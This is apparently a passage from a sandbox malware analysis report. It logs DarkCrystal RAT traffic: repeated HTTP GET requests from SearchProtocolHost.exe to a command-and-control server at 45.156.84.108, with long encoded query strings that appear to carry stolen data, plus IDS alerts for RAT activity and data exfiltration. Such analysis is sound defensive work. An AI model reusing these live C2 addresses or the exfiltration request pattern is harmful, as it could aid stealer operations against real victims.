MwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&cdcb8a5f0961cc7a07b5ac3d675f9811=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 | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&4b3ed01d1b7d17d2374397bcf88db6a2=0VfiIiOicDMmNWM0YzMhJmZ3QDM1EGOwgDMwAjMzQGM3YmN0EGOiwiI5UGZ3EjY1MmMmljNzEGZ4IzY0QjZiN2NmRDM5UGOkBDOkFzY0kDNiJiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | text | 104 b | malicious |
2948 | SearchProtocolHost.exe | GET | 200 | 45.156.84.108:80 | http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nI4ETZ0YGOjFWZ4ETM3QTYmRTO2cDM4UGNiVDNwUjZ3UjNzUTYhFTY0IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W&4b3ed01d1b7d17d2374397bcf88db6a2=QX9JiI6IyNwY2YxQjNzEmYmdDNwUTY4ADOwADMyMDZwcjZ2QTY4ICLigTMlRjZ4MWYlhTMxcDNhZGN5YzNwgTZ0IWN0ATNmdTN2MTNhFWMhRjI6IyNxUGMhlTOykjZjNDMzAjZiFGNzUDZxUWNiVGZ4YmMiJCLiUmZlRDOlNjNxMDOilTNwAjMwkzMlZmM2YTOmFWNmdDZhlDZ0AzM3ImI6IiZ5YWMjN2Y5ATMzcjZlZmZiRjZ4QzYwMjMhdzYhBzY3Iyes0nI5EjbJ9SSp9UaBR0TrZFRatmQU10dJRlT0sGVapmRHp1MZdUTshGVahmRUllejpXTycmaaJTUU9EeRJjT3VkaJNXS5BVavpWSwkkMOxmSykFbGpXWx0kaOd3YEpVNFpXWphmaatmUq5UbORVT6VVbNFTR65kMFR0TthmeORTSDxUaBpWS2kUaZBTW6l1MF1WWsZ1RadXUXpVbGdVTqhGROJTWt5ENF1WWopkaNtGbq1UeJdlTzU0RPhXVtlVaz52TpV0RkhmUFRGNW1WSzVlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq5ENoNUS2gGMSd3YqxUeBNUUnVlRVRkQD10dRpmT0VFVhd2aTRVVoNlW5ljMRd2apV1b3dlWwUzVTl2bqlEbxcVWPZlRVRkSDxUarNVU2RTRLdWSYpFMChVWrZURJpnTXF2bChVW5RWRJJEZrZ1ZR12YoJVbihmUzUVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnlkeNd2dXlVd5cVY65EWa1WOtNWUClnTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJVXOHpVd5cEV2V1RjZnSYRmRKl2TpVVbiZHcYpFdsdEZpdXaJdXQE10dBRUTp9maJNnRHRme5c0YpdXaJRXOHplb1cVYMJ0QaxmUYFWdWZUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplEMJpWT4RzQNR3dD5kMrRkT1VEVOl2bqlka5ckYpdXaJNEZrlkNJNVZ5JlbiFTOykVa3lWSp9maJVXOXFmbW12YpdXaJl2bqlUNShVYqp0QMlWU65UdrpmT1lEVPhHNT5ENFpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOicDMmNWM0YzMhJmZ3QDM1EGOwgDMwAjMzQGM3YmN0EGOiwiIlBjZ5EzYxQGNjhjZiJWOkFWZlNTZzYDN2Y2MyATZ1UTY5UjN1UmMxIiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W | NL | text | 104 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2948 | SearchProtocolHost.exe | 45.156.84.108:80 | — | combahton GmbH | NL | malicious |
PID | Process | Class | Message |
---|---|---|---|
2948 | SearchProtocolHost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
2948 | SearchProtocolHost.exe | A Network Trojan was detected | ET MALWARE DarkCrystal Rat Stealer Data Exfiltration Activity |
2948 | SearchProtocolHost.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) |